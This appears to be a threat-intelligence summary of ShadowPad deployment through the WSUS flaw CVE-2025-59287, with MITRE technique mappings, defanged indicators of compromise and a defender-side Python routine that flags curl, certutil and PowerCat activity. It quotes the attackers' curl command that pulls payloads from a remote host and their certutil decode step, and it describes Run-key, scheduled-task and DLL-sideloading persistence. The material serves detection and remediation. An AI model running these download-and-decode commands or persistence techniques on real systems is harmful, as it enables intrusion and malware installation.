AhnLab ASEC and SentinelOne reporting show that CVE-2025-59287 in WSUS was exploited to deliver ShadowPad: the operators chained PowerCat for shell access and used certutil and curl to fetch and decode payloads. Observed artifacts include ETDApix.dll sideloaded by ETDCtrlHelper.exe, a .tmp file holding the core module and its persistence configuration, and C2 at 163.61.102[.]245. Remediation: apply the Microsoft update and restrict WSUS access. #CVE-2025-59287 #ShadowPad
Keypoints
- Attackers exploited a remote code execution vulnerability in Windows Server Update Services (CVE-2025-59287) to gain system-level access on WSUS-enabled servers.
- Initial access included executing PowerCat (PowerShell Netcat) to obtain a CMD shell after PoC code disclosure.
- Operators used built-in Windows utilities (curl.exe and certutil.exe) to download and decode ShadowPad components (tmp, dll, exe files).
- ShadowPad was deployed via DLL sideloading: ETDApix.dll loaded by ETDCtrlHelper.exe with the core functionality in a .tmp file (0C137A80.tmp).
- Configuration shows persistence via Run key and scheduled task entries using names like Q-X64 and Microsoft Corporation, with multiple startup paths.
- Observed C2 infrastructure includes 163.61.102[.]245 over HTTP/HTTPS with specific HTTP headers and POST usage.
- Recommended mitigations: apply Microsoft patch for CVE-2025-59287, restrict WSUS access (block non-Microsoft inbound on TCP 8530/8531), and audit PowerShell, certutil, curl usage and network logs.
MITRE Techniques
- [T1218 ] Signed Binary Proxy Execution – Legitimate Windows utilities certutil.exe and curl.exe were used to download and decode ShadowPad components (“certutil -decode C:\users\%ASD%\tmp.txt C:\programdata\0C137A80.tmp” and curl downloads).
- [T1059.001 ] PowerShell – PowerCat (PowerShell-based Netcat) was executed to obtain a system shell (“PowerCat being executed against a Windows Server system…gained access to the CMD shell”).
- [T1574.001 ] Hijack Execution Flow: DLL (DLL Side-Loading) – ShadowPad relied on DLL sideloading where ETDApix.dll was loaded by ETDCtrlHelper.exe to run the loader in memory (“When the legitimate executable (ETDCtrlHelper.exe) runs, the malicious DLL (ETDApix.dll) acts as the ShadowPad loader, operating entirely in memory.”).
- [T1105 ] Ingress Tool Transfer – Attackers downloaded payload files (tmp.txt, dll.txt, exe.txt) from hxxp://149.28.78[.]189:42306 to the victim using curl and saved them to disk (“curl hxxp://149.28.78[.]189:42306/tmp.txt -o C:\users\%ASD%\tmp.txt …”).
- [T1547.001 ] Registry Run Keys / Startup Folder – Persistence created via Run key entries under SOFTWARE\Microsoft\Windows\CurrentVersion\Run with value Q-X64 (“Persistence Registry Key … Persistence Registry Value Q-X64”).
- [T1053.005 ] Scheduled Task – Persistence via Task Scheduler entries under Microsoft\Windows\UPnP with names/descriptions matching Q-X64 (“Task Scheduler Path Microsoft\Windows\UPnP … Task Scheduler Name Microsoft Corporation”).
- [T1071.001 ] Application Layer Protocol: Web Protocols – C2 communication over HTTP/HTTPS to 163.61.102[.]245:443 using POST and specific headers (“C&C #1 HTTP://163.61.102[.]245:443 … C&C Header #1 POST … User-Agent: Mozilla/5.0 …”).
- [T1055 ] Process Injection – ShadowPad injects into legitimate processes listed in config (WinMail.exe, wmpnetwk.exe, wmplayer.exe, svchost.exe) (“Injection Target Process Path … ‘svchost.exe’ Q-X64”).
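A defender-side triage routine for the telemetry described above, added here as an example and not part of the AhnLab or SentinelOne reporting: it matches process command lines against the curl download, certutil decode and PowerCat patterns quoted under T1105, T1218 and T1059.001, and flags the Q-X64 Run-key value from T1547.001. The sample events, the %ASD% paths and the Run-key data are constructed placeholders.

```python
import re

# Constructed sample telemetry (not from the report): process-creation command
# lines and one registry-set event, modelled on Sysmon Event ID 1/13 fields.
# Paths under %ASD% and the Run-key data are placeholders.
SAMPLE_EVENTS = [
    {"type": "process", "cmdline":
     r"curl hxxp://149.28.78[.]189:42306/tmp.txt -o C:\users\%ASD%\tmp.txt"},
    {"type": "process", "cmdline":
     r"certutil -decode C:\users\%ASD%\tmp.txt C:\programdata\0C137A80.tmp"},
    {"type": "process", "cmdline":
     r"powershell.exe -File C:\users\%ASD%\powercat.ps1"},
    {"type": "registry", "key": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
     "value": "Q-X64", "data": r"C:\PLACEHOLDER\ETDCtrlHelper.exe"},
    {"type": "process", "cmdline": r"certutil -verify C:\temp\cert.cer"},  # benign
]

# Command-line patterns for the three LOLBin steps described in the report.
RULES = [
    ("T1105", "curl writing a remote file to disk",
     re.compile(r"\bcurl(?:\.exe)?\b.*\s(?:-o|--output)\s", re.I)),
    ("T1218", "certutil decoding a staged payload",
     re.compile(r"\bcertutil(?:\.exe)?\b.*\s-decode\b", re.I)),
    ("T1059.001", "PowerCat invoked through PowerShell",
     re.compile(r"\bpowershell(?:\.exe)?\b.*powercat", re.I)),
]
PERSISTENCE_VALUE = "Q-X64"  # Run-key value name reported for ShadowPad

def triage(events):
    """Return (technique, description, evidence) tuples for matching events."""
    findings = []
    for ev in events:
        if ev["type"] == "process":
            for tech, desc, rx in RULES:
                if rx.search(ev["cmdline"]):
                    findings.append((tech, desc, ev["cmdline"]))
        elif ev["type"] == "registry":
            if (ev["key"].lower().endswith(r"\currentversion\run")
                    and ev["value"] == PERSISTENCE_VALUE):
                findings.append(("T1547.001", "Run-key persistence value Q-X64",
                                 ev["key"] + "\\" + ev["value"]))
    return findings

def staged_download_chain(findings):
    """True when both the curl download and the certutil decode were seen."""
    techs = {t for t, _, _ in findings}
    return {"T1105", "T1218"} <= techs
```

The two-step check in staged_download_chain is what separates this chain from routine certutil or curl use, which on its own is noisy in most environments.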
Indicators of Compromise
- [IP Address ] C2 and download host – 163.61.102[.]245 (C2 over HTTP/HTTPS), 149.28.78[.]189:42306 (payload host).
- [File Name ] Downloaded and temporary files used in deployment – tmp.txt, dll.txt, exe.txt and 0C137A80.tmp (core ShadowPad tmp file).
- [File Hash ] Malicious DLL and EXE hashes – ETDApix.dll MD5 27e00b5594530e8c5e004098eef2ec50, ETDCtrlHelper.exe MD5 564e7d39a9b6da3cf0da3373351ac717.
- [Mutex / Service ] Persistence identifiers – Mutex/Service name Q-X64 and service display/description strings (Q-X64 Service / Q-X64 Service for windows).
- [Registry Key ] Persistence location – SOFTWARE\Microsoft\Windows\CurrentVersion\Run value Q-X64 (persistence registry entry).
Read more: https://asec.ahnlab.com/en/91166/